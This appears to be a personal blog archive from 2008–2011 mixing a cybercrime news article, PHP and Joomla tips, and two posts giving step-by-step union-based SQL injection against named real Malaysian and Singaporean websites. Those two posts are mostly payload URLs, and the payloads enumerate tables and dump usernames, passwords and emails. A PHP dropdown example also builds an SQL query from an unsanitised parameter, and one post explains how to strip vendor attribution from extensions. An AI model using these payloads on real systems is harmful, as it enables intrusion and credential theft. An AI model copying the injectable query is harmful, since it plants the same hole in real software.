Friday, December 30, 2011

ANCAMAN JENAYAH CYBER YANG MEMBIMBANGKAN

Posted by MOBYDICK


MENYEDARI dunia Internet adalah suatu alam terbuka untuk mereka yang mahu merebut peluang menjadi kaya, seorang lelaki warganegara Switzerland tidak mahu ketinggalan mengambil kesempatan itu. Tambah menyeronokkan hati peguam berusia 40-an itu adalah apabila berkenalan dengan seorang lelaki dari Malaysia melalui sebuah laman sosial. Dia teruja kerana menganggap pencariannya bakal membuahkan hasil lumayan.

Lelaki yang ditemui melalui jaringan maya itu memperkenalkan diri sebagai seorang ahli perniagaan yang menjalankan bisnes eksport bahan-bahan mentah penternakan dan memiliki syarikat yang berpangkalan di Malaysia. Peguam itu ditawarkan sebuah kontrak perniagaan mengeksport bekalan makanan ayam ke Hong Kong, tetapi diminta membayar sejumlah wang terlebih dahulu bagi memastikan kontrak tersebut tidak terlepas ke tangan orang. Teruja dengan tawaran yang tidak disangka-sangka itu, peguam itu menurut sahaja kemahuan 'ahli perniagaan' itu. Wang sejumlah RM1,360,079.50 pun telah dipindahkan ke dalam akaun lelaki tersebut.

Begitupun, oleh kerana tiada apa-apa yang berlaku dalam tempoh masa yang terlalu panjang, dia yang mempunyai latar belakang undang-undang itu telah melakukan penyiasatan sendiri terhadap syarikat tersebut dengan maklumat yang ada. Luluh hatinya apabila mendapati syarikat tersebut palsu dan tidak pernah wujud di Malaysia. Tidak mahu si penipu siber itu terlepas begitu sahaja, dia telah melaporkan kes itu kepada pihak berkuasa. Mujur tindakan pantas pihak polis telah berjaya menangkap dua individu, seorang lelaki dan wanita berhubung kes tersebut. Itu merupakan salah satu kes jenayah siber di negara ini.

Pada 15 Jun lalu, negara digemparkan pula dengan serangan alam siber yang ditunjangi penggodam antarabangsa. Dikenali sebagai Anonymous menerusi Operation Malaysia, kesan buruk penggodamannya amat serius.Dalam serangan tersebut, sebanyak 91 buah laman web telah mengalami gangguan perkhidmatan.
Terdedah ancaman
Kegiatan jenayah dan salah laku siber tidak hanya melumpuhkan laman web, malah sesiapa sahaja boleh terdedah kepada ancaman tanpa sempadan itu.
Ia terbukti apabila CyberSecurity Malaysia melalui Pusat Bantuan Cyber999 telah mencatatkan sebanyak 14,157 insiden keselamatan siber yang dilaporkan oleh pengguna Internet di seluruh Malaysia dari bulan Januari sehingga November 2011.
Jumlah tersebut menunjukkan berlaku peningkatan mendadak sebanyak 97 peratus berbanding tempoh yang sama pada tahun lalu.Mengikut istilahnya, jenayah siber merujuk kepada perbuatan atau insiden yang dilakukan di alam siber, sama ada menggunakan komputer mahupun peralatan seperti perkakasan dan perisian telekomunikasi.
"Ia dilakukan dengan menggunakan telefon pintar atau peranti teknologi maklumat dan komunikasi (ICT), dengan teknologi Internet digunakan sebagai perantara dan tidak melibatkan perbuatan jenayah secara fizikal.
"Sebagai contoh, penjenayah ini menceroboh maklumat organisasi atau individu, harta intelektual, penipuan kad kredit, kecurian identiti, penggodaman ke atas sistem rangkaian komputer dan laman web organisasi mahupun individu," kata Ketua Pegawai Eksekutif CyberSecurity Malaysia, Lt. Kol. (Bersara) Prof. Datuk Husin Jazri ketika ditemui Kosmo!.
Husin menjelaskan, setiap aktiviti jenayah siber yang dilakukan mempunyai motif atau tujuan tersendiri seperti membalas dendam, marah, berhibur sekadar suka-suka, kewangan dan politik.Di kebanyakan negara, landskap jenayah siber yang berlaku kesemuanya hampir sama.
Laporan insiden
Di negara ini, CyberSecurity Malaysia mengklasifikasi kategori jenayah atau ancaman siber berdasarkan data laporan insiden keselamatan siber melalui penggunaan Internet yang dikumpulkan Pusat Bantuan Cyber999.

PENIPUAN KAD KREDIT

Statistik yang dikumpul melalui pusat bantuan tersebut dikenali sebagai insiden keselamatan siber, dan tidak dikategorikan sebagai jenayah siber.Antara insiden keselamatan siber yang dikenal pasti adalah seperti penipuan, spam, pencerobohan, kod berbahaya, cubaan pencerobohan, gangguan siber, laporan kerentanan (vulnerabilities), gangguan perkhidmatan (DoS) dan juga berkaitan kandungan.
Husin memberitahu, terdapat beberapa punca atau sebab berlakunya peningkatan insiden tersebut. Antaranya adalah jumlah pengguna Internet yang semakin bertambah dari semasa ke semasa dan kurang pengetahuan mengenai kepentingan keselamatan siber.
Pusat Bantuan Cyber999 juga banyak menerima laporan insiden keselamatan Internet berkaitan penggunaan media sosial."Ada dalam kalangan pengguna Internet yang kurang arif dan juga kurang berhati-hati sewaktu melayari Internet," ujar beliau.
Justeru, peluang tersebut memudahkan lagi penjenayah siber untuk mengambil kesempatan ke atas mereka.Selain daripada itu, terdapat juga peningkatan ancaman-ancaman penggodaman seperti pencacatan laman web (web defacement) dan juga pencerobohan.
Kelemahan utama yang menjadi sasaran kebanyakan penjenayah siber ialah pihak yang menggunakan penyelesaian sekuriti tidak asli dan yang luput tarikh sah.
Menurut Pengarah Saluran Jualan Kaspersky Lab Asia Tenggara, Jimmy Fong, dalam satu kenyataan akhbar, pengguna peranti teknologi seperti komputer, telefon pintar, tablet dan peranti lain, ia seumpama seseorang yang meninggalkan pintu dan tingkap rumah dalam keadaan terbuka.
"Dalam situasi perbandingan tersebut, pengguna seolah-olah berharap tiada sesiapa yang akan masuk ke dalam rumah seterusnya menyalah guna atau mencuri hak miliknya.
"Di dalam kes ini, ia melibatkan data dan identiti anda," katanya.


http://kgmokkan.blogspot.com/2011/12/ancaman-jenayah-cyber-yang.html#ixzz1hsTTF9YI

Sunday, January 23, 2011

poca galeri 2.7.1:

administrator\components\com_phocagallery\libraries\phocagallery\render\renderfront.php at 479 line:


function getString() {
return '<'.'d'.'i'.'v'.' '.'s'.'t'.'y'.'l'.'e'.'='.'"'.'t'.'e'.'x'.'t'.'-'.'a'.'l'.'i'.'g'.'n'.':'.' '.'c'.'e'.'n'.'t'.'e'.'r'.';'.' '.'c'.'o'.'l'.'o'.'r'.':'.' '.'r'.'g'.'b'.'('.'2'.'1'.'1'.','.' '.'2'.'1'.'1'.','.' '.'2'.'1'.'1'.')'.';'.'"'.'>'.'P'.'o'.'w'.'e'.'r'.'e'.'d'.' '.'b'.'y'.' '.'<'.'a'.' '.'h'.'r'.'e'.'f'.'='.'"'.'h'.'t'.'t'.'p'.':'.'/'.'/'.'w'.'w'.'w'.'.'.'p'.'h'.'o'.'c'.'a'.'.'.'c'.'z'.'"'.' '.'s'.'t'.'y'.'l'.'e'.'='.'"'.'t'.'e'.'x'.'t'.'-'.'d'.'e'.'c'.'o'.'r'.'a'.'t'.'i'.'o'.'n'.':'.' '.'n'.'o'.'n'.'e'.';'.'"'.' '.'t'.'a'.'r'.'g'.'e'.'t'.'='.'"'.'_'.'b'.'l'.'a'.'n'.'k'.'"'.' '.'t'.'i'.'t'.'l'.'e'.'='.'"'.'P'.'h'.'o'.'c'.'a'.'.'.'c'.'z'.'"'.'>'.'P'.'h'.'o'.'c'.'a'.'<'.'/'.'a'.'>'.' '.'<'.'a'.' '.'h'.'r'.'e'.'f'.'='.'"'.'h'.'t'.'t'.'p'.':'.'/'.'/'.'w'.'w'.'w'.'.'.'p'.'h'.'o'.'c'.'a'.'.'.'c'.'z'.'/'.'p'.'h'.'o'.'c'.'a'.'g'.'a'.'l'.'l'.'e'.'r'.'y'.'"'.' '.'s'.'t'.'y'.'l'.'e'.'='.'"'.'t'.'e'.'x'.'t'.'-'.'d'.'e'.'c'.'o'.'r'.'a'.'t'.'i'.'o'.'n'.':'.' '.'n'.'o'.'n'.'e'.';'.'"'.' '.'t'.'a'.'r'.'g'.'e'.'t'.'='.'"'.'_'.'b'.'l'.'a'.'n'.'k'.'"'.' '.'t'.'i'.'t'.'l'.'e'.'='.'"'.'P'.'h'.'o'.'c'.'a'.' '.'G'.'a'.'l'.'l'.'e'.'r'.'y'.'"'.'>'.'G'.'a'.'l'.'l'.'e'.'r'.'y'.'<'.'/'.'a'.'>'.'<'.'/'.'d'.'i'.'v'.'>';
}

source==sss

function getString() {
return '';
}

-----
The go to: components\com_phocagallery\views\categories\view.html.php and find the line 242 with base64_decode:

===

$tmpl['ab'] = base64_decode('PGRpdiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyBjb2xvcjogcmdiKDIxMSwgMjExLCAyMTEpOyI+UG93ZXJlZCBieSA8YSBocmVmPSJodHRwOi8vd3d3LnBob2NhLmN6IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYS5jeiI+UGhvY2E8L2E+IDxhIGhyZWY9Imh0dHA6Ly93d3cucGhvY2EuY3ovcGhvY2FnYWxsZXJ5IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYSBHYWxsZXJ5Ij5HYWxsZXJ5PC9hPjwvZGl2Pg0K');
==
$tmpl['ab'] = '' ;
---------
And then components\com_phocagallery\views\category\view.html.php at line 169

==
$tmpl['md'] = base64_decode('PGRpdiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyBjb2xvcjojZDNkM2QzOyI+UG93ZXJlZCBieSA8YSBocmVmPSJodHRwOi8vd3d3LnBob2NhLmN6IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYS5jeiI+UGhvY2E8L2E+IDxhIGhyZWY9Imh0dHA6Ly93d3cucGhvY2EuY3ovcGhvY2FnYWxsZXJ5IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYSBHYWxsZXJ5Ij5HYWxsZXJ5PC9hPjwvZGl2Pg0K');
==

$tmpl['md'] = '';

Poca dnld Version 1.3.7

Root/administrator/components/com_phocadownload/helpers/phocadownload.php

function renderPhocaDownload() {

return '
Power'.'ed by Phoc'.'a Dow'.'nload
';

return '';

hwdVideoShare

* Log in to the Joomla Administrator
* Visit the General Settings of hwdVideoShare
* Click on the Settings tab, and go to the bottom of the page
* Change the option Show Powered by hwdVideoShare notice? to No
* Click the Save button.

Wednesday, October 14, 2009

Populate triple drop down list from database using Ajax and PHP

im looking for populate drop down in php..b4 this im using dotnet its easy just drag and added a simple code..but in php we have to understant javascrpt and php..after google a while this is the easy code to populate the drop down....copy from here...
___________________

TABLE

CREATE TABLE `country` (
`id` tinyint(4) NOT NULL auto_increment,
`country` varchar(20) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM ;

CREATE TABLE `state` (
`id` tinyint(4) NOT NULL auto_increment,
`countryid` tinyint(4) NOT NULL,
`statename` varchar(40) NOT NULL,
PRIMARY KEY (`id`)
) TYPE=MyISAM ;

CREATE TABLE `city` (
`id` tinyint(4) NOT NULL auto_increment,
`city` varchar(50) default NULL,
`stateid` tinyint(4) default NULL,
`countryid` tinyint(4) NOT NULL,
PRIMARY KEY (`id`)
) TYPE=MyISAM ;

______________________

index.php















Country
State


City





_____________________

function getState(countryId)
{
var strURL="findState.php?country="+countryId;
var req = getXMLHTTP();
if (req)
{
req.onreadystatechange = function()
{
if (req.readyState == 4)
{
// only if "OK"
if (req.status == 200)
{
document.getElementById('statediv').innerHTML=req.responseText;
} else {
alert("There was a problem while using XMLHTTP:\n" + req.statusText);
}
}
}
req.open("GET", strURL, true);
req.send(null);
}
}

_______
findState.php


$link = mysql_connect('localhost', 'root', ''); /change the configuration if required
if (!$link) {
die('Could not connect: ' . mysql_error());
}
mysql_select_db('db_ajax'); //change this if required
$query="select city from city where countryid=$country";
$result=mysql_query($query);?>

Tuesday, August 04, 2009

scraping your pc for mp3 files

Nice script for manage list all mp3 file yahhh...myb can be use to list out all extension file on our pc .... thx

The following is a simple dos trick to create a playlist of all your mp3’s.

1. go to the start menu
2. click run
3. enter cmd => this opens a black dos window
4. type dir /b/s *.mp3 > c:\mp3list.m3u

When this command finishes, a file will be created under c: with a list of all your mp3 files.
The m3u file is a plain text file with links to all your music. Some audio applications us this format for playlists.

Adding leading zero’s and id’s with php

For a project of that require a running number in php we should put a number that format to make it works..just found this code from this blog

code for the id from MySQL
$fuckksssssss = mysql_insert_id();

code for the seven digits
$fuckksssssss = sprintf(”%07d”,$fuckksssssss );



ve fun yahhhhh

Wednesday, December 03, 2008

SQL Injection ( web malay )

Web target sudah di patch......
Terima Kasih
============================================================
Tool :
1. Mozilla, IE
2. Komputer yang konek ke internet
Perlengkapan laen (gak wajib) :1. Secangkir kopi
2. Foto cewek cakep di samping komputer...
3. Keuletan....



1. Cari target
Contoh targer:contoh: http://taseen.com.my/news/news.php?id=3


2. Cek lubang dengan menambahkan ' pada url
Contoh: contoh: http://taseen.com.my/news/news.php?id=3'

Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe


3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah = silahkan tambahkan -
jadi urlnya:contoh: http://taseen.com.my/news/news.php?id=-3

Sekarang silahkan kasi order ampe ketemu error....
Contoh:

http://taseen.com.my/news/news.php?id=3 order by 1/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 2/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 3/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 4/* <---- gak ada eror http://taseen.com.my/news/news.php?id=3 order by 5/* <---- ada eror bahwa web tersebut punya 4 colom....

4 Sekarang masukkan perintah unoin all select 1,2,3,4/* <<<--- serupakan colom yang ada dallam web tersebut contoh: http://taseen.com.my/news/news.php?id=-3 union all select 1,2,3,4/*

Maka akan keluar angka , misal angka yang keluar adalah 3 ,Angka yang keluar pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version untuk mengecek versi

5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: users/* admin/* members/* dll nama colom: user_name , user-d, user_is, username, password, pass dll

Sekarang kita coba username
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,username,4 from users/* jreng jreng...... usernya keliatan.......

Sekarang coba passwordnya.....
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,password,4 from users/* jreng jreng..... passwordnya keliatan juga....

Sekarang kta coba dua duanya
http://taseen.com.my/news/news.php?id=-3 union select all 1,2,concat(username,0x3a,password,0x3a,email),4 from users/*

jreng jreng.... user n passwordnya keliatan.... Selesei deh...... dah dulu ya... mau belajar dulu... maklum masih smp...kwkwkwkw...

SQL Injection singapura website edition

Ketemu lagi dengan saya...... hehehe masih tetep sql injection......... tapi targetnya beda coy bukan malay tapi sg........................... kpan kapan .au .us .go.id hehehehe

Kayak biasanya:

1. Cari target
Contoh targer:contoh: http://www.pdscientific.com.sg/source/news.php?id=1


2. Cek lubang dengan menambahkan ' pada url
Contoh: contoh: http://www.pdscientific.com.sg/source/news.php?id=1'

Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe


3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah = silahkan tambahkan -
jadi urlnya:contoh: http://www.pdscientific.com.sg/source/news.php?id=1

Sekarang silahkan kasi order ampe ketemu error....
Contoh:

http://www.pdscientific.com.sg/source/news.php?id=1 order by 1/* <---- gak ada eror

http://www.pdscientific.com.sg/source/news.php?id=1 order by 2/* <---- gak ada eror

http://www.pdscientific.com.sg/source/news.php?id=1 order by 3/* <---- gak ada eror

http://www.pdscientific.com.sg/source/news.php?id=1 order by 4/* <---- gak ada eror

http://www.pdscientific.com.sg/source/news.php?id=1 order by 5/* <---- gak ada error

http://www.pdscientific.com.sg/source/news.php?id=1 order by 6/* <---- gak ada error

http://www.pdscientific.com.sg/source/news.php?id=1 order by 7/* <---- gak ada error

http://www.pdscientific.com.sg/source/news.php?id=1 order by 8/* <---- ada error

Maka tersebut punya 7 colom....

4 Sekarang masukkan perintah unoin all select 1,2,3,4,5,6,7/* <<<--- serupakan colom yang ada dallam web tersebut
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,2,3,4,5,6,7/*

Maka akan keluar angka , misal angka yang keluar adalah 2 ,Angka yang keluar pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version untuk mengecek versi

5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: users/* admin/* members/* dll nama colom: user_name , user-d, user_is, username, password, pass dll

6. Kita coba liat liat tabel yang ada
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables/*

7. Kita coba liat juga kolom2 nya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns/*

Udah puas liat liat ???? Terserah deh di apain

8. Sekarang kita coba berburu username
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_name,3,4,5,6,7 from users/*

9.Sekarang coba berburu passwordnya.....
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1 union all select 1,user_pwd,3,4,5,6,7 from users/*

10.Sekarang kita coba berburu user_id nya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_id,3,4,5,6,7%20from%20users/*

11.Sekarang kita coba berburu login_namenya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,user_login,3,4,5,6,7%20from%20users/*

12. Sekarang kita coba semuanya
contoh:
http://www.pdscientific.com.sg/source/news.php?id=-1%20union%20all%20select%201,concat(user_id,0x3a,user_login,0x3a,user_pwd,0x3a,user_name),3,4,5,6,7%20from%20users/*


Wah udah komplit nie..... skarang tinggal kreatifitas kamu aja............'

Thursday, November 27, 2008

php ajax

huh just complete my ajax code..its long codes compared with dotnet that i just need postback page.i need to understand the method passing the string...just refer to www3scol and build the code back,.,i try repeatly the program and see the response from 127.0.0.1 very late..duh better use postback in dotnet.ngonggggg

Wednesday, September 10, 2008

Linux package installation or php upgrade howto

Installing PHP is easy these days.
Red Hat enterprise Linux PHP installation

If you would like to install or upgrade PHP use up2date command:
# up2date php
CentOS/Fedora core Linux PHP installation

If you would like to install PHP use yum command
# yum install php

If you would like to upgrade PHP use yum command
# yum update php
Debian / Ubentu Linux PHP installation

If you would like to install or upgrade PHP use atp-get command
# apt-get install php4-cgi php4-cli
# sudo apt-get install php4-cgi php4-cli

To install PHP 5
# apt-get install php5-cgi php5-cli
# sudo apt-get install php5-cgi php5-cli
FreeBSD PHP installation

Use pkg_add command as follows:
# pkg_add -v -r php

Use above command to install Apache or Lighttpd web server.


u also can use yum search (word) too
Locations of visitors to this page
DROP ME A MSG :D